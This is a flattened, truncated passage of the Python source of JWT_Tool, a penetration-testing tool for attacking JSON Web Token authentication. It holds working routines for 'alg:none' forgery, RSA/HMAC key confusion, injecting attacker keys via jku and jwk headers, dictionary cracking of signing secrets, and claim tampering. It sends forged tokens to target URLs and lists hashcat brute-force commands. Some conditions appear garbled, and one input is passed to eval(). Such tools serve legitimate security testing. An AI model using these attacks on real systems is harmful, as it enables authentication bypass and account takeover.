#!/usr/bin/env python3 # # JWT_Tool version 2.2.7 (28_05_2024) # Written by Andy Tyler (@ticarpi) # Please use responsibly... # Software URL: https://github.com/ticarpi/jwt_tool # Web: https://www.ticarpi.com # Twitter: @ticarpi jwttoolvers = "2.2.7" import ssl import sys import os import re import hashlib import hmac import base64 import json import random from urllib.parse import urljoin, urlparse import argparse from datetime import datetime import configparser from http.cookies import SimpleCookie from collections import OrderedDict try: from Cryptodome.Signature import PKCS1_v1_5, DSS, pss from Cryptodome.Hash import SHA256, SHA384, SHA512 from Cryptodome.PublicKey import RSA, ECC except: print("WARNING: Cryptodome libraries not imported - these are needed for asymmetric crypto signing and verifying") print("On most Linux systems you can run the following command to install:") print("python3 -m pip install pycryptodomex\n") exit(1) try: from termcolor import cprint except: print("WARNING: termcolor library is not imported - this is used to make the output clearer and oh so pretty") print("On most Linux systems you can run the following command to install:") print("python3 -m pip install termcolor\n") exit(1) try: import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) except: print("WARNING: Python Requests libraries not imported - these are needed for external service interaction") print("On most Linux systems you can run the following command to install:") print("python3 -m pip install requests\n") exit(1) # To fix broken colours in Windows cmd/Powershell: uncomment the below two lines. You will need to install colorama: 'python3 -m pip install colorama' # import colorama # colorama.init() def cprintc(textval, colval): if not args.bare: cprint(textval, colval) def createConfig(): privKeyName = path+"/jwttool_custom_private_RSA.pem" pubkeyName = path+"/jwttool_custom_public_RSA.pem" ecprivKeyName = path+"/jwttool_custom_private_EC.pem" ecpubkeyName = path+"/jwttool_custom_public_EC.pem" jwksName = path+"/jwttool_custom_jwks.json" proxyHost = "" config = configparser.ConfigParser(allow_no_value=True) config.optionxform = str config['crypto'] = {'pubkey': pubkeyName, 'privkey': privKeyName, 'ecpubkey': ecpubkeyName, 'ecprivkey': ecprivKeyName, 'jwks': jwksName} config['customising'] = {'useragent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) jwt_tool', 'jwks_kid': 'jwt_tool'} if (os.path.isfile(privKeyName)) and (os.path.isfile(pubkeyName)) and (os.path.isfile(ecprivKeyName)) and (os.path.isfile(ecpubkeyName)) and (os.path.isfile(jwksName)): cprintc("Found existing Public and Private Keys - using these...", "cyan") origjwks = open(jwksName, "r").read() jwks_b64 = base64.b64encode(origjwks.encode('ascii')) else: # gen RSA keypair pubKey, privKey = newRSAKeyPair() with open(privKeyName, 'w') as test_priv_out: test_priv_out.write(privKey.decode()) with open(pubkeyName, 'w') as test_pub_out: test_pub_out.write(pubKey.decode()) # gen EC keypair ecpubKey, ecprivKey = newECKeyPair() with open(ecprivKeyName, 'w') as ectest_priv_out: ectest_priv_out.write(ecprivKey) with open(ecpubkeyName, 'w') as ectest_pub_out: ectest_pub_out.write(ecpubKey) # gen jwks new_key = RSA.importKey(pubKey) n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) jwksbuild = buildJWKS(n, e, "jwt_tool") jwksout = {"keys": []} jwksout["keys"].append(jwksbuild) fulljwks = json.dumps(jwksout,separators=(",",":"), indent=4) with open(jwksName, 'w') as test_jwks_out: test_jwks_out.write(fulljwks) jwks_b64 = base64.urlsafe_b64encode(fulljwks.encode('ascii')) config['services'] = {'jwt_tool_version': jwttoolvers, '# To disable the proxy option set this value to: False (no quotes). For Docker installations with a Windows host OS set this to: "host.docker.internal:8080"': None, 'proxy': proxyHost+':8080', '# To disable following redirects set this value to: False (no quotes)': None, 'redir': 'True', '# Set this to the URL you are hosting your custom JWKS file (jwttool_custom_jwks.json) - your own server, or maybe use this cheeky reflective URL (https://httpbin.org/base64/{base64-encoded_JWKS_here})': None, 'jwksloc': '', 'jwksdynamic': 'https://httpbin.org/base64/'+jwks_b64.decode(), '# Set this to the base URL of a Collaborator server, somewhere you can read live logs, a Request Bin etc.': None, 'httplistener': ''} config['input'] = {'wordlist': 'jwt-common.txt', 'commonHeaders': 'common-headers.txt', 'commonPayloads': 'common-payloads.txt'} config['argvals'] = {'# Set at runtime - changes here are ignored': None, 'sigType': '', 'targetUrl': '', 'cookies': '', 'key': '', 'keyList': '', 'keyFile': '', 'headerLoc': '', 'payloadclaim': '', 'headerclaim': '', 'payloadvalue': '', 'headervalue': '', 'canaryvalue': '', 'header': '', 'exploitType': '', 'scanMode': '', 'reqMode': '', 'postData': '', 'resCode': '', 'resSize': '', 'resContent': ''} with open(configFileName, 'w') as configfile: config.write(configfile) cprintc("Configuration file built - review contents of \"jwtconf.ini\" to customise your options.", "cyan") cprintc("Make sure to set the \"httplistener\" value to a URL you can monitor to enable out-of-band checks.", "cyan") exit(1) def sendToken(token, cookiedict, track, headertoken="", postdata=None): if not postdata: postdata = config['argvals']['postData'] url = config['argvals']['targetUrl'] headers = {'User-agent': config['customising']['useragent']+" "+track} if headertoken: for eachHeader in headertoken: headerName, headerVal = eachHeader.split(":",1) headers[headerName] = headerVal.lstrip(" ") try: if config['services']['redir'] == "True": redirBool = True else: redirBool = False if config['services']['proxy'] == "False": if postdata: response = requests.post(url, data=postdata, headers=headers, cookies=cookiedict, proxies=False, verify=False, allow_redirects=redirBool) else: response = requests.get(url, headers=headers, cookies=cookiedict, proxies=False, verify=False, allow_redirects=redirBool) else: proxies = {'http': 'http://'+config['services']['proxy'], 'https': 'http://'+config['services']['proxy']} if postdata: response = requests.post(url, data=postdata, headers=headers, cookies=cookiedict, proxies=proxies, verify=False, allow_redirects=redirBool) else: response = requests.get(url, headers=headers, cookies=cookiedict, proxies=proxies, verify=False, allow_redirects=redirBool) if int(response.elapsed.total_seconds()) >= 9: cprintc("HTTP response took about 10 seconds or more - could be a sign of a bug or vulnerability", "cyan") return [response.status_code, len(response.content), response.content] except requests.exceptions.ProxyError as err: cprintc("[ERROR] ProxyError - check proxy is up and not set to tamper with requests\n"+str(err), "red") exit(1) def parse_dict_cookies(value): cookiedict = {} for item in value.split(';'): item = item.strip() if not item: continue if '=' not in item: cookiedict[item] = None continue name, value = item.split('=', 1) cookiedict[name] = value return cookiedict def strip_dict_cookies(value): cookiestring = "" for item in value.split(';'): if re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', item): continue else: cookiestring += "; "+item cookiestring = cookiestring.lstrip("; ") return cookiestring def jwtOut(token, fromMod, desc=""): genTime = datetime.now().strftime('%Y-%m-%d %H:%M:%S') idFrag = genTime+str(token) logID = "jwttool_"+hashlib.md5(idFrag.encode()).hexdigest() if config['argvals']['targetUrl'] != "": curTargetUrl = config['argvals']['targetUrl'] p = re.compile(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*') if config['argvals']['headerloc'] == "cookies": cookietoken = p.subn(token, config['argvals']['cookies'], 0) else: cookietoken = [config['argvals']['cookies'],0] if config['argvals']['headerloc'] == "headers": headertoken = [[],0] for eachHeader in args.headers: try: headerSub = p.subn(token, eachHeader, 0) headertoken[0].append(headerSub[0]) if headerSub[1] == 1: headertoken[1] = 1 except: pass else: headertoken = [[],0] if args.headers: for eachHeader in args.headers: headertoken[0].append(eachHeader) if config['argvals']['headerloc'] == "postdata": posttoken = p.subn(token, config['argvals']['postdata'], 0) else: posttoken = [config['argvals']['postdata'],0] try: cookiedict = parse_dict_cookies(cookietoken[0]) except: cookiedict = {} # Check if token was included in substitution if cookietoken[1] == 1 or headertoken[1] == 1 or posttoken[1]: resData = sendToken(token, cookiedict, logID, headertoken[0], posttoken[0]) else: if config['argvals']['overridesub'] == "true": resData = sendToken(token, cookiedict, logID, headertoken[0], posttoken[0]) else: cprintc("[-] No substitution occurred - check that a token is included in a cookie/header in the request", "red") # cprintc(headertoken, cookietoken, "cyan") exit(1) if config['argvals']['canaryvalue']: if config['argvals']['canaryvalue'] in str(resData[2]): cprintc("[+] FOUND \""+config['argvals']['canaryvalue']+"\" in response:\n"+logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "green") else: cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "cyan") else: if 200 <= resData[0] < 300: cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "green") elif 300 <= resData[0] < 400: cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "cyan") elif 400 <= resData[0] < 600: cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "red") else: if desc != "": cprintc(logID+" - "+desc, "cyan") if not args.bare: cprintc("[+] "+token, "green") else: print(token) curTargetUrl = "Not sent" additional = "[Commandline request: "+' '.join(sys.argv[0:])+']' setLog(token, genTime, logID, fromMod, curTargetUrl, additional) try: config['argvals']['rescode'],config['argvals']['ressize'],config['argvals']['rescontent'] = str(resData[0]),str(resData[1]),str(resData[2]) except: pass def setLog(jwt, genTime, logID, modulename, targetURL, additional): logLine = genTime+" | "+modulename+" | "+targetURL+" | "+additional with open(logFilename, 'a') as logFile: logFile.write(logID+" - "+logLine+" - "+jwt+"\n") return logID def buildHead(alg, headDict): newHead = headDict newHead["alg"] = alg newHead = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=") return newHead def checkNullSig(contents): jwtNull = contents.decode()+"." return jwtNull def checkAlgNone(headDict, paylB64): alg1 = "none" newHead1 = buildHead(alg1, headDict) CVEToken0 = newHead1+"."+paylB64+"." alg = "None" newHead = buildHead(alg, headDict) CVEToken1 = newHead+"."+paylB64+"." alg = "NONE" newHead = buildHead(alg, headDict) CVEToken2 = newHead+"."+paylB64+"." alg = "nOnE" newHead = buildHead(alg, headDict) CVEToken3 = newHead+"."+paylB64+"." return [CVEToken0, CVEToken1, CVEToken2, CVEToken3] def checkPubKeyExploit(headDict, paylB64, pubKey): try: key = open(pubKey).read() cprintc("File loaded: "+pubKey, "cyan") except: cprintc("[-] File not found", "red") exit(1) newHead = headDict newHead["alg"] = "HS256" newHead = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") newTok = newHead+"."+paylB64 newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newTok.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") return newTok, newSig def injectpayloadclaim(payloadclaim, injectionvalue): newpaylDict = paylDict newpaylDict[payloadclaim] = castInput(injectionvalue) newPaylB64 = base64.urlsafe_b64encode(json.dumps(newpaylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") return newpaylDict, newPaylB64 def injectheaderclaim(headerclaim, injectionvalue): newheadDict = headDict newheadDict[headerclaim] = castInput(injectionvalue) newHeadB64 = base64.urlsafe_b64encode(json.dumps(newheadDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") return newheadDict, newHeadB64 def tamperToken(paylDict, headDict, sig): cprintc("\n====================================================================\nThis option allows you to tamper with the header, contents and \nsignature of the JWT.\n====================================================================", "white") cprintc("\nToken header values:", "white") while True: i = 0 headList = [0] for pair in headDict: menuNum = i+1 if isinstance(headDict[pair], dict): cprintc("["+str(menuNum)+"] "+pair+" = JSON object:", "green") for subclaim in headDict[pair]: cprintc(" [+] "+subclaim+" = "+str(headDict[pair][subclaim]), "green") else: if type(headDict[pair]) == str: cprintc("["+str(menuNum)+"] "+pair+" = \""+str(headDict[pair])+"\"", "green") else: cprintc("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair]), "green") headList.append(pair) i += 1 cprintc("["+str(i+1)+"] *ADD A VALUE*", "white") cprintc("["+str(i+2)+"] *DELETE A VALUE*", "white") cprintc("[0] Continue to next step", "white") selection = "" cprintc("\nPlease select a field number:\n(or 0 to Continue)", "white") try: selection = int(input("> ")) except: cprintc("Invalid selection", "red") exit(1) if selection0: if isinstance(headDict[headList[selection]], dict): cprintc("\nPlease select a sub-field number for the "+pair+" claim:\n(or 0 to Continue)", "white") newVal = OrderedDict() for subclaim in headDict[headList[selection]]: newVal[subclaim] = headDict[pair][subclaim] newVal = buildSubclaim(newVal, headList, selection) headDict[headList[selection]] = newVal else: cprintc("\nCurrent value of "+headList[selection]+" is: "+str(headDict[headList[selection]]), "white") cprintc("Please enter new value and hit ENTER", "white") newVal = input("> ") headDict[headList[selection]] = castInput(newVal) elif selection == i+1: cprintc("Please enter new Key and hit ENTER", "white") newPair = input("> ") cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") newInput = input("> ") headList.append(newPair) headDict[headList[selection]] = castInput(newInput) elif selection == i+2: cprintc("Please select a Key to DELETE and hit ENTER", "white") i = 0 for pair in headDict: menuNum = i+1 cprintc("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair]), "white") headList.append(pair) i += 1 try: delPair = int(input("> ")) except: cprintc("Invalid selection", "red") exit(1) del headDict[headList[delPair]] elif selection == 0: break else: exit(1) cprintc("\nToken payload values:", "white") while True: comparestamps, expiredtoken = dissectPayl(paylDict, count=True) i = 0 paylList = [0] for pair in paylDict: menuNum = i+1 paylList.append(pair) i += 1 cprintc("["+str(i+1)+"] *ADD A VALUE*", "white") cprintc("["+str(i+2)+"] *DELETE A VALUE*", "white") if len(comparestamps) > 0: cprintc("["+str(i+3)+"] *UPDATE TIMESTAMPS*", "white") cprintc("[0] Continue to next step", "white") selection = "" cprintc("\nPlease select a field number:\n(or 0 to Continue)", "white") try: selection = int(input("> ")) except: cprintc("Invalid selection", "red") exit(1) if selection0: if isinstance(paylDict[paylList[selection]], dict): cprintc("\nPlease select a sub-field number for the "+str(paylList[selection])+" claim:\n(or 0 to Continue)", "white") newVal = OrderedDict() for subclaim in paylDict[paylList[selection]]: newVal[subclaim] = paylDict[paylList[selection]][subclaim] newVal = buildSubclaim(newVal, paylList, selection) paylDict[paylList[selection]] = newVal else: cprintc("\nCurrent value of "+paylList[selection]+" is: "+str(paylDict[paylList[selection]]), "white") cprintc("Please enter new value and hit ENTER", "white") newVal = input("> ") paylDict[paylList[selection]] = castInput(newVal) elif selection == i+1: cprintc("Please enter new Key and hit ENTER", "white") newPair = input("> ") cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") newVal = input("> ") try: newVal = int(newVal) except: pass paylList.append(newPair) paylDict[paylList[selection]] = castInput(newVal) elif selection == i+2: cprintc("Please select a Key to DELETE and hit ENTER", "white") i = 0 for pair in paylDict: menuNum = i+1 cprintc("["+str(menuNum)+"] "+pair+" = "+str(paylDict[pair]), "white") paylList.append(pair) i += 1 delPair = eval(input("> ")) del paylDict[paylList[delPair]] elif selection == i+3: cprintc("Timestamp updating:", "white") cprintc("[1] Update earliest timestamp to current time (keeping offsets)", "white") cprintc("[2] Add 1 hour to timestamps", "white") cprintc("[3] Add 1 day to timestamps", "white") cprintc("[4] Remove 1 hour from timestamps", "white") cprintc("[5] Remove 1 day from timestamps", "white") cprintc("\nPlease select an option from above (1-5):", "white") try: selection = int(input("> ")) except: cprintc("Invalid selection", "red") exit(1) if selection == 1: nowtime = int(datetime.now().timestamp()) timecomp = {} for timestamp in comparestamps: timecomp[timestamp] = paylDict[timestamp] earliest = min(timecomp, key=timecomp.get) earlytime = paylDict[earliest] for timestamp in comparestamps: if timestamp == earliest: paylDict[timestamp] = nowtime else: difftime = int(paylDict[timestamp])-int(earlytime) paylDict[timestamp] = nowtime+difftime elif selection == 2: for timestamp in comparestamps: newVal = int(paylDict[timestamp])+3600 paylDict[timestamp] = newVal elif selection == 3: for timestamp in comparestamps: newVal = int(paylDict[timestamp])+86400 paylDict[timestamp] = newVal elif selection == 4: for timestamp in comparestamps: newVal = int(paylDict[timestamp])-3600 paylDict[timestamp] = newVal elif selection == 5: for timestamp in comparestamps: newVal = int(paylDict[timestamp])-86400 paylDict[timestamp] = newVal else: cprintc("Invalid selection", "red") exit(1) elif selection == 0: break else: exit(1) if config['argvals']['sigType'] == "" and config['argvals']['exploitType'] == "": cprintc("Signature unchanged - no signing method specified (-S or -X)", "cyan") newContents = genContents(headDict, paylDict) desc = "Tampered token:" jwtOut(newContents+"."+sig, "Manual Tamper - original signature", desc) elif config['argvals']['exploitType'] != "": runExploits() elif config['argvals']['sigType'] != "": signingToken(headDict, paylDict) def signingToken(newheadDict, newpaylDict): if config['argvals']['sigType'][0:2] == "hs": key = "" if args.password: key = config['argvals']['key'] elif args.keyfile: key = open(config['argvals']['keyFile']).read() newSig, newContents = signTokenHS(newheadDict, newpaylDict, key, int(config['argvals']['sigType'][2:])) desc = "Tampered token - HMAC Signing:" jwtOut(newContents+"."+newSig, "Manual Tamper - HMAC Signing", desc) elif config['argvals']['sigType'][0:2] == "rs": newSig, newContents = signTokenRSA(newheadDict, newpaylDict, config['crypto']['privkey'], int(config['argvals']['sigType'][2:])) desc = "Tampered token - RSA Signing:" jwtOut(newContents+"."+newSig, "Manual Tamper - RSA Signing", desc) elif config['argvals']['sigType'][0:2] == "es": newSig, newContents = signTokenEC(newheadDict, newpaylDict, config['crypto']['ecprivkey'], int(config['argvals']['sigType'][2:])) desc = "Tampered token - EC Signing:" jwtOut(newContents+"."+newSig, "Manual Tamper - EC Signing", desc) elif config['argvals']['sigType'][0:2] == "ps": newSig, newContents = signTokenPSS(newheadDict, newpaylDict, config['crypto']['privkey'], int(config['argvals']['sigType'][2:])) desc = "Tampered token - PSS RSA Signing:" jwtOut(newContents+"."+newSig, "Manual Tamper - PSS RSA Signing", desc) def checkSig(sig, contents, key): quiet = False if key == "": cprintc("Type in the key to test", "white") key = input("> ") testKey(key.encode(), sig, contents, headDict, quiet) def checkSigKid(sig, contents): quiet = False cprintc("\nLoading key file...", "cyan") try: key1 = open(config['argvals']['keyFile']).read() cprintc("File loaded: "+config['argvals']['keyFile'], "cyan") testKey(key1.encode(), sig, contents, headDict, quiet) except: cprintc("Could not load key file", "red") exit(1) def crackSig(sig, contents): quiet = True if headDict["alg"][0:2] != "HS": cprintc("Algorithm is not HMAC-SHA - cannot test against passwords, try the Verify function.", "red") return # print("\nLoading key dictionary...") try: # cprintc("File loaded: "+config['argvals']['keyList'], "cyan") keyLst = open(config['argvals']['keyList'], "r", encoding='utf-8', errors='ignore') nextKey = keyLst.readline() except: cprintc("No dictionary file loaded", "red") exit(1) # print("Testing passwords in dictionary...") utf8errors = 0 wordcount = 0 while nextKey: wordcount += 1 try: cracked = testKey(nextKey.strip().encode('UTF-8'), sig, contents, headDict, quiet) except: cracked = False if not cracked: if wordcount % 1000000 == 0: cprintc("[*] Tested "+str(int(wordcount/1000000))+" million passwords so far", "cyan") try: nextKey = keyLst.readline() except: utf8errors += 1 nextKey = keyLst.readline() else: return if cracked == False: cprintc("[-] Key not in dictionary", "red") if not args.mode: cprintc("\n===============================\nAs your list wasn't able to crack this token you might be better off using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6\n===============================\n", "cyan") if utf8errors > 0: cprintc(utf8errors, " UTF-8 incompatible passwords skipped", "cyan") def castInput(newInput): if "{" in str(newInput): try: jsonInput = json.loads(newInput) return jsonInput except ValueError: pass if "\"" in str(newInput): return newInput.strip("\"") elif newInput == "True" or newInput == "true": return True elif newInput == "False" or newInput == "false": return False elif newInput == "null": return None else: try: numInput = float(newInput) try: intInput = int(newInput) return intInput except: return numInput except: return str(newInput) return newInput def buildSubclaim(newVal, claimList, selection): while True: subList = [0] s = 0 for subclaim in newVal: subNum = s+1 cprintc("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim]), "white") s += 1 subList.append(subclaim) cprintc("["+str(s+1)+"] *ADD A VALUE*", "white") cprintc("["+str(s+2)+"] *DELETE A VALUE*", "white") cprintc("[0] Continue to next step", "white") try: subSel = int(input("> ")) except: cprintc("Invalid selection", "red") exit(1) if subSel<=len(newVal) and subSel>0: selClaim = subList[subSel] cprintc("\nCurrent value of "+selClaim+" is: "+str(newVal[selClaim]), "white") cprintc("Please enter new value and hit ENTER", "white") newVal[selClaim] = castInput(input("> ")) cprintc("", "white") elif subSel == s+1: cprintc("Please enter new Key and hit ENTER", "white") newPair = input("> ") cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") newVal[newPair] = castInput(input("> ")) elif subSel == s+2: cprintc("Please select a Key to DELETE and hit ENTER", "white") s = 0 for subclaim in newVal: subNum = s+1 cprintc("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim]), "white") subList.append(subclaim) s += 1 try: selSub = int(input("> ")) except: cprintc("Invalid selection", "red") exit(1) delSub = subList[selSub] del newVal[delSub] elif subSel == 0: return newVal def testKey(key, sig, contents, headDict, quiet): if headDict["alg"] == "HS256": testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha256).digest()).decode('UTF-8').strip("=") elif headDict["alg"] == "HS384": testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha384).digest()).decode('UTF-8').strip("=") elif headDict["alg"] == "HS512": testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha512).digest()).decode('UTF-8').strip("=") else: cprintc("Algorithm is not HMAC-SHA - cannot test with this tool.", "red") exit(1) if testSig == sig: cracked = True if len(key) > 25: cprintc("[+] CORRECT key found:\n"+key.decode('UTF-8'), "green") else: cprintc("[+] "+key.decode('UTF-8')+" is the CORRECT key!", "green") cprintc("You can tamper/fuzz the token contents (-T/-I) and sign it using:\npython3 jwt_tool.py [options here] -S "+str(headDict["alg"]).lower()+" -p \""+key.decode('UTF-8')+"\"", "cyan") return cracked else: cracked = False if quiet == False: if len(key) > 25: cprintc("[-] "+key[0:25].decode('UTF-8')+"...(output trimmed) is not the correct key", "red") else: cprintc("[-] "+key.decode('UTF-8')+" is not the correct key", "red") return cracked def getRSAKeyPair(): #config['crypto']['pubkey'] = config['crypto']['pubkey'] privkey = config['crypto']['privkey'] cprintc("key: "+privkey, "cyan") privKey = RSA.importKey(open(privkey).read()) pubKey = privKey.publickey().exportKey("PEM") #config['crypto']['pubkey'] = RSA.importKey(config['crypto']['pubkey']) return pubKey, privKey def newRSAKeyPair(): new_key = RSA.generate(2048, e=65537) pubKey = new_key.publickey().exportKey("PEM") privKey = new_key.exportKey("PEM") return pubKey, privKey def newECKeyPair(): new_key = ECC.generate(curve='P-256') pubkey = new_key.public_key().export_key(format="PEM") privKey = new_key.export_key(format="PEM") return pubkey, privKey def signTokenHS(headDict, paylDict, key, hashLength): newHead = headDict newHead["alg"] = "HS"+str(hashLength) if hashLength == 384: newContents = genContents(newHead, paylDict) newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha384).digest()).decode('UTF-8').strip("=") elif hashLength == 512: newContents = genContents(newHead, paylDict) newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha512).digest()).decode('UTF-8').strip("=") else: newContents = genContents(newHead, paylDict) newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") return newSig, newContents def buildJWKS(n, e, kid): newjwks = {} newjwks["kty"] = "RSA" newjwks["kid"] = kid newjwks["use"] = "sig" newjwks["e"] = str(e.decode('UTF-8')) newjwks["n"] = str(n.decode('UTF-8').rstrip("=")) return newjwks def jwksGen(headDict, paylDict, jku, privKey, kid="jwt_tool"): newHead = headDict nowtime = str(int(datetime.now().timestamp())) key = RSA.importKey(open(config['crypto']['privkey']).read()) pubKey = key.publickey().exportKey("PEM") privKey = key.export_key(format="PEM") new_key = RSA.importKey(pubKey) n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) privKeyName = config['crypto']['privkey'] newjwks = buildJWKS(n, e, kid) newHead["jku"] = jku newHead["alg"] = "RS256" key = RSA.importKey(privKey) newContents = genContents(newHead, paylDict) newContents = newContents.encode('UTF-8') h = SHA256.new(newContents) signer = PKCS1_v1_5.new(key) try: signature = signer.sign(h) except: cprintc("Invalid Private Key", "red") exit(1) newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") jwksout = json.dumps(newjwks,separators=(",",":"), indent=4) jwksbuild = {"keys": []} jwksbuild["keys"].append(newjwks) fulljwks = json.dumps(jwksbuild,separators=(",",":"), indent=4) if config['crypto']['jwks'] == "": jwksName = "jwks_jwttool_RSA_"+nowtime+".json" with open(jwksName, 'w') as test_jwks_out: test_jwks_out.write(fulljwks) else: jwksName = config['crypto']['jwks'] return newSig, newContents.decode('UTF-8'), jwksout, privKeyName, jwksName, fulljwks def jwksEmbed(newheadDict, newpaylDict): newHead = newheadDict pubKey, privKey = getRSAKeyPair() new_key = RSA.importKey(pubKey) n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) newjwks = buildJWKS(n, e, config['customising']['jwks_kid']) newHead["jwk"] = newjwks newHead["alg"] = "RS256" key = privKey # key = RSA.importKey(privKey) newContents = genContents(newHead, newpaylDict) newContents = newContents.encode('UTF-8') h = SHA256.new(newContents) signer = PKCS1_v1_5.new(key) try: signature = signer.sign(h) except: cprintc("Invalid Private Key", "red") exit(1) newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") return newSig, newContents.decode('UTF-8') def signTokenRSA(headDict, paylDict, privKey, hashLength): newHead = headDict newHead["alg"] = "RS"+str(hashLength) key = RSA.importKey(open(config['crypto']['privkey']).read()) newContents = genContents(newHead, paylDict) newContents = newContents.encode('UTF-8') if hashLength == 256: h = SHA256.new(newContents) elif hashLength == 384: h = SHA384.new(newContents) elif hashLength == 512: h = SHA512.new(newContents) else: cprintc("Invalid RSA hash length", "red") exit(1) signer = PKCS1_v1_5.new(key) try: signature = signer.sign(h) except: cprintc("Invalid Private Key", "red") exit(1) newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") return newSig, newContents.decode('UTF-8') def signTokenEC(headDict, paylDict, privKey, hashLength): newHead = headDict newHead["alg"] = "ES"+str(hashLength) key = ECC.import_key(open(config['crypto']['ecprivkey']).read()) newContents = genContents(newHead, paylDict) newContents = newContents.encode('UTF-8') if hashLength == 256: h = SHA256.new(newContents) elif hashLength == 384: h = SHA384.new(newContents) elif hashLength == 512: h = SHA512.new(newContents) else: cprintc("Invalid hash length", "red") exit(1) signer = DSS.new(key, 'fips-186-3') try: signature = signer.sign(h) except: cprintc("Invalid Private Key", "red") exit(1) newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") return newSig, newContents.decode('UTF-8') def signTokenPSS(headDict, paylDict, privKey, hashLength): newHead = headDict newHead["alg"] = "PS"+str(hashLength) key = RSA.importKey(open(config['crypto']['privkey']).read()) newContents = genContents(newHead, paylDict) newContents = newContents.encode('UTF-8') if hashLength == 256: h = SHA256.new(newContents) elif hashLength == 384: h = SHA384.new(newContents) elif hashLength == 512: h = SHA512.new(newContents) else: cprintc("Invalid RSA hash length", "red") exit(1) try: signature = pss.new(key).sign(h) except: cprintc("Invalid Private Key", "red") exit(1) newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") return newSig, newContents.decode('UTF-8') def verifyTokenRSA(headDict, paylDict, sig, pubKey): key = RSA.importKey(open(pubKey).read()) newContents = genContents(headDict, paylDict) newContents = newContents.encode('UTF-8') if "-" in sig: try: sig = base64.urlsafe_b64decode(sig) except: pass try: sig = base64.urlsafe_b64decode(sig+"=") except: pass try: sig = base64.urlsafe_b64decode(sig+"==") except: pass elif "+" in sig: try: sig = base64.b64decode(sig) except: pass try: sig = base64.b64decode(sig+"=") except: pass try: sig = base64.b64decode(sig+"==") except: pass else: cprintc("Signature not Base64 encoded HEX", "red") if headDict['alg'] == "RS256": h = SHA256.new(newContents) elif headDict['alg'] == "RS384": h = SHA384.new(newContents) elif headDict['alg'] == "RS512": h = SHA512.new(newContents) else: cprintc("Invalid RSA algorithm", "red") verifier = PKCS1_v1_5.new(key) try: valid = verifier.verify(h, sig) if valid: cprintc("RSA Signature is VALID", "green") valid = True else: cprintc("RSA Signature is INVALID", "red") valid = False except: cprintc("The Public Key is invalid", "red") return valid def verifyTokenEC(headDict, paylDict, sig, pubKey): newContents = genContents(headDict, paylDict) message = newContents.encode('UTF-8') if "-" in str(sig): try: signature = base64.urlsafe_b64decode(sig) except: pass try: signature = base64.urlsafe_b64decode(sig+"=") except: pass try: signature = base64.urlsafe_b64decode(sig+"==") except: pass elif "+" in str(sig): try: signature = base64.b64decode(sig) except: pass try: signature = base64.b64decode(sig+"=") except: pass try: signature = base64.b64decode(sig+"==") except: pass else: cprintc("Signature not Base64 encoded HEX", "red") if headDict['alg'] == "ES256": h = SHA256.new(message) elif headDict['alg'] == "ES384": h = SHA384.new(message) elif headDict['alg'] == "ES512": h = SHA512.new(message) else: cprintc("Invalid ECDSA algorithm", "red") pubkey = open(pubKey, "r") pub_key = ECC.import_key(pubkey.read()) verifier = DSS.new(pub_key, 'fips-186-3') try: verifier.verify(h, signature) cprintc("ECC Signature is VALID", "green") valid = True except: cprintc("ECC Signature is INVALID", "red") valid = False return valid def verifyTokenPSS(headDict, paylDict, sig, pubKey): key = RSA.importKey(open(pubKey).read()) newContents = genContents(headDict, paylDict) newContents = 